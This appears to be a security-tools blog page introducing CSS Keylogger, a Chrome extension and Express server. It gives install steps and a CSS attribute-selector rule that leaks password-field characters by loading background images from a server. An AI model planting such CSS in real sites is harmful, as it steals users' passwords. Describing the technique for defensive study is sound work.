CSS Keylogger is a Chrome extension and Express server that exploits keylogging abilities of CSS. Using a simple script one can create a css file that will send a custom request for every ASCII character.
git clone https://github.com/maxchehab/CSS-Keylogging
chrome://extensions
in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu’s icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).Load unpacked extension…
to pop up a file-selection dialog.css-keylogger-extension
in the directory which you downloaded this repository.Also Read Volatility Framework – Volatile memory extraction utility framework
yarn
yarn start
C
on the top right of any webpage.This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image
.
For example, the following css will select all input’s with a type
that equals password
and a value
that ends with a
. It will then try to load an image from here.
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Learn how to create and use Bash functions with this complete tutorial. Includes syntax, arguments,…
Introduction Unlock the full potential of your Linux system with this comprehensive guide to essential…
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…